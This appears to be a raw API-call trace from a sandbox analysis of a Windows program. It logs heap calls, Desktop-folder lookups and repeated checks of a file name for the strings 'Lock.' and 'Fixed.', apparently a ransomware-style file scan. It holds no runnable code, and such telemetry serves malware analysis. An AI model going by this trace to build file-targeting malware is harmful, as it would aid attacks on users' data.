[0189.184] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.184] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0189.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0189.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0189.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0189.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0189.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0189.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0189.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0189.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0189.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="srS5tTxQY.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rS5tTxQY.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S5tTxQY.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5tTxQY.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tTxQY.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TxQY.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xQY.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QY.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0189.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0189.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0189.186] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0189.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0189.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0189.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0189.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0189.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0189.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0189.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0189.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3ba0 [0189.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0189.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="srS5tTxQY.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rS5tTxQY.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S5tTxQY.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5tTxQY.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tTxQY.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TxQY.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xQY.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QY.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0189.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0189.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0189.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0189.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0189.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0189.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0189.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0189.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0189.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0189.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0189.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0189.188] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0189.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0189.188] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0189.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0189.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0189.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dd8 [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0189.189] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0189.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0189.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0189.189] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0189.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0189.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0189.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0189.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0189.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0189.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0189.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0189.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0189.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0189.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0189.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0189.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0189.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0189.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0189.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0189.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0189.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0189.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0189.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0189.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0189.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0189.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0189.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0189.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0189.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0189.191] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0189.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0189.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0189.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0189.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0189.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0189.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0189.192] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0189.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0189.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0189.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0189.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0189.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0189.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0189.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0189.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0189.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0189.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0189.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0189.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0189.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0189.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0189.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0189.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0189.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0189.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0189.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0189.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0189.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0189.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0189.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0189.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0189.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0189.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0189.195] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0189.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0189.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.195] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0189.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0189.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0189.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0189.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0189.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0189.196] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 